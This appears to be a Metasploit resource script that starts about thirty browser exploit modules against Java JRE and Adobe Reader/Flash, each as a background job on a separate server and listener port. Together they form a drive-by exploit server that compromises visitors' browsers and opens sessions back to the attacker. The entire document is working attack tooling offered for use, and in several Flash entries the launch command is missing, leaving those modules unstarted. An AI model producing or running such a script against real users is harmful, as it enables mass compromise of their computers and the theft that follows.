<ruby>
begin
run_single("set ExitOnSession false")
run_single("use exploit/multi/browser/java_jre17_jmxbean_2")
run_single("set URIPATH /java_jre17_jmxbean_2")
run_single("set SRVPORT 8082")
run_single("set LPORT 8889")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_jre17_method_handle")
run_single("set URIPATH /java_jre17_method_handle")
run_single("set SRVPORT 8083")
run_single("set LPORT 8890")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_jre17_provider_skeleton")
run_single("set URIPATH /java_jre17_provider_skeleton")
run_single("set SRVPORT 8084")
run_single("set LPORT 8891")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_jre17_reflection_types")
run_single("set URIPATH /java_jre17_reflection_types")
run_single("set SRVPORT 8085")
run_single("set LPORT 8892")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_rhino")
run_single("set URIPATH /java_rhino")
run_single("set SRVPORT 8086")
run_single("set LPORT 8893")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_rmi_connection_impl")
run_single("set URIPATH /java_rmi_connection_impl")
run_single("set SRVPORT 8087")
run_single("set LPORT 8894")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_setdifficm_bof")
run_single("set URIPATH /java_setdifficm_bof")
run_single("set SRVPORT 8088")
run_single("set LPORT 8895")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_signed_applet")
run_single("set URIPATH /java_signed_applet")
run_single("set SRVPORT 8089")
run_single("set LPORT 8896")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_storeimagearray")
run_single("set URIPATH /java_storeimagearray")
run_single("set SRVPORT 8090")
run_single("set LPORT 8897")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_trusted_chain")
run_single("set URIPATH /java_trusted_chain")
run_single("set SRVPORT 8091")
run_single("set LPORT 8898")
run_single("exploit -j")
run_single("use exploit/multi/browser/java_verifier_field_access")
run_single("set URIPATH /java_verifier_field_access")
run_single("set SRVPORT 8092")
run_single("set LPORT 8899")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_cooltype_sing")
run_single("set URIPATH /adobe_cooltype_sing")
run_single("set SRVPORT 8093")
run_single("set LPORT 8900")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_flash_avm2")
run_single("set URIPATH /adobe_flash_avm2")
run_single("set SRVPORT 8094")
run_single("set LPORT 8901")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_flash_filters_type_confusion")
run_single("set URIPATH /adobe_flash_filters_type_confusion")
run_single("set SRVPORT 8095")
run_single("set LPORT 8902")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_flash_mp4_cprt")
run_single("set URIPATH /adobe_flash_mp4_cprt")
run_single("set SRVPORT 8096")
run_single("set LPORT 8903")
run_single("use exploit/windows/browser/adobe_flash_otf_font")
run_single("set URIPATH /adobe_flash_otf_font")
run_single("set SRVPORT 8097")
run_single("set LPORT 8904")
run_single("use exploit/windows/browser/adobe_flash_pixel_bender_bof")
run_single("set URIPATH /adobe_flash_pixel_bender_bof")
run_single("set SRVPORT 8098")
run_single("set LPORT 8905")
run_single("use exploit/windows/browser/adobe_flash_regex_value")
run_single("set URIPATH /adobe_flash_regex_value")
run_single("set SRVPORT 8099")
run_single("set LPORT 8906")
run_single("use exploit/windows/browser/adobe_flash_rtmp")
run_single("set URIPATH /adobe_flash_rtmp")
run_single("set SRVPORT 8100")
run_single("set LPORT 8907")
run_single("use exploit/windows/browser/adobe_flash_sps")
run_single("set URIPATH /adobe_flash_sps")
run_single("set SRVPORT 8101")
run_single("set LPORT 8908")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_flashplayer_arrayindexing")
run_single("set URIPATH /adobe_flashplayer_arrayindexing")
run_single("set SRVPORT 8102")
run_single("set LPORT 8909")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_flashplayer_avm")
run_single("set URIPATH /adobe_flashplayer_avm")
run_single("set SRVPORT 8103")
run_single("set LPORT 8910")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_flashplayer_flash10o")
run_single("set URIPATH /adobe_flashplayer_flash10o")
run_single("set SRVPORT 8104")
run_single("set LPORT 8911")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_flashplayer_newfunction")
run_single("set URIPATH /adobe_flashplayer_newfunction")
run_single("set SRVPORT 8105")
run_single("set LPORT 8912")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_flatedecode_predictor02")
run_single("set URIPATH /adobe_flatedecode_predictor02")
run_single("set SRVPORT 8106")
run_single("set LPORT 8913")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_geticon")
run_single("set URIPATH /adobe_geticon")
run_single("set SRVPORT 8107")
run_single("set LPORT 8914")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_jbig2decode")
run_single("set URIPATH /adobe_jbig2decode")
run_single("set SRVPORT 8108")
run_single("set LPORT 8915")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_media_newplayer")
run_single("set URIPATH /adobe_media_newplayer")
run_single("set SRVPORT 8109")
run_single("set LPORT 8916")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_toolbutton")
run_single("set URIPATH /adobe_toolbutton")
run_single("set SRVPORT 8110")
run_single("set LPORT 8917")
run_single("exploit -j")
run_single("use exploit/windows/browser/adobe_utilprintf")
run_single("set URIPATH /adobe_utilprintf")
run_single("set SRVPORT 8111")
run_single("set LPORT 8918")
run_single("exploit -j")
end
</ruby>
